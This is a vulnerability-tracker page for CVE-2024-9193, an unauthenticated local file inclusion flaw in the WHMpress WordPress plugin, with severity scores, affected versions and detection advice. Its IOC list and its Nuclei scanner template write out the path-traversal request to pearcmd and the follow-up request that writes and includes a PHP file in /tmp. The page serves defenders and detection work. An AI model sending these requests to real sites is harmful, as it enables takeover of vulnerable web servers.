CVE-2024-9193
published 2025-02-28CVE-2024-9193: The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including…
PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.11%
86.2th percentile
The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6.3-revision-0 via the whmpress_domain_search_ajax_extended_results() function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. Utilizing the /admin/services.php file, this can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| creativeon | whmpress_whmcs_wordpress_integration_plugin | <= 6.3-revision-0 | — |
| whmpress | whmcs | < 6.3 | 6.3 |
| whmpress | whmcs | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/wp-admin/admin-ajax.php
commandaction=whmpress_action&do=whmpress_domain_search_ajax_extended_results&page_size=1&is_title=no¶ms[style]=../../../../../../../../../../../usr/local/lib/php/pearcmd
path/tmp/
- →Detect unauthenticated POST requests to /wp-admin/admin-ajax.php containing the parameter 'action=whmpress_action' combined with 'do=whmpress_domain_search_ajax_extended_results' — this is the vulnerable AJAX handler for CVE-2024-9193.
- →Monitor for response bodies containing both 'whmpress_action' and 'CHANNEL PEAR.PHP.NET', or 'PEAR_Config', which are indicators of successful pearcmd-based LFI exploitation.
- →Monitor WordPress options changes (e.g., default_role set to 'administrator', user_registration enabled) following exploitation, as attackers leverage /admin/services.php to escalate privileges. ↗
- →Flag PHP file creation or inclusion from /tmp/ (e.g., /tmp/*.php) on the web server, which is a common second-stage indicator when pearcmd is abused to write and then include a webshell.
- ·The vulnerability affects WHMpress plugin versions up to and including 6.3-revision-0; ensure version checks are scoped accordingly to avoid false positives on patched installations. ↗
- ·The attack is unauthenticated — no session or nonce is required — meaning perimeter controls relying on authentication checks will not block exploitation of this endpoint. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7fmf-f9xm-8gm4: The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6
ghsa_unreviewed·2025-02-28
CVE-2024-9193 [CRITICAL] CWE-98 GHSA-7fmf-f9xm-8gm4: The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6
The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6.3-revision-0 via the whmpress_domain_search_ajax_extended_results() function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. Utilizing the /admin/services.php file, this can be leveraged to update the default role for registration to administrator and enable
VulnCheck
whmpress whmcs Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
vulncheck·2024·CVSS 9.8
CVE-2024-9193 [CRITICAL] whmpress whmcs Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
whmpress whmcs Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6.3-revision-0 via the whmpress_domain_search_ajax_extended_results() function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. Utilizing the
No detection rules found.
Nuclei
WHMpress <= 6.3-revision-0 - Unauthenticated Local File Inclusion to Arbitrary Options Update
nuclei·CVSS 9.8
CVE-2024-9193 [CRITICAL] WHMpress <= 6.3-revision-0 - Unauthenticated Local File Inclusion to Arbitrary Options Update
WHMpress +/tmp/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=whmpress_action&do=whmpress_domain_search_ajax_extended_results&page_size=1&is_title=no¶ms[style]=../../../../../../../../../../../usr/local/lib/php/pearcmd&
- |
POST /wp-admin/admin-ajax.php?0={{marker}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=whmpress_action&do=whmpress_domain_search_ajax_extended_results&page_size=1&is_title=no¶ms[style]=../../../../../../../../../../../tmp/{{randstr}}&
matchers:
- type: dsl
dsl:
- 'contains_all(body_1,"whmpress_action","CHANNEL PEAR.PHP.NET")'
- 'contains_all(body_2, "{{randomstr}}", "PEAR_Config")'
condition: and
# digest: 4b0a004830460221008402be345e364d2d6aa6e1eac30e6751ad5b8a
No writeups or analysis indexed.
2025-02-28
Published
Exploited in the wild